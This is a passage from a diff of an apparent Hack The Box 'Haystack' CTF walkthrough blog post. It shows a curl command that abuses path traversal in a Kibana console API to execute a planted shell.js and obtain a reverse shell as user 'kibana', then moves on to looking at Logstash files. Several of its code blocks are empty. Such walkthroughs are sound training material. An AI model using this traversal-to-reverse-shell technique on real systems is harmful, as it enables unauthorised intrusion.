1n4r1/1n4r1.github.io/_posts/2019-11-05-Hackthebox-Heystack-Walkthrough.md

 {% endhighlight %}

 Then, launch a netcat listener and send a get request to access to the "shell.js".<br>
-We can achieve a reverse shell.
+We can achieve a reverse shell as a user "kibana".
 {% highlight shell %}
 [security@haystack shm]$ curl 'http://127.0.0.1:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../dev/shm/shell.js'
 {% endhighlight %}
 {% highlight shell %}

 {% endhighlihgt %}

+Then, try to look at the files for logstash.<br>
+{% highlight shell %}

+{% endhighlight %}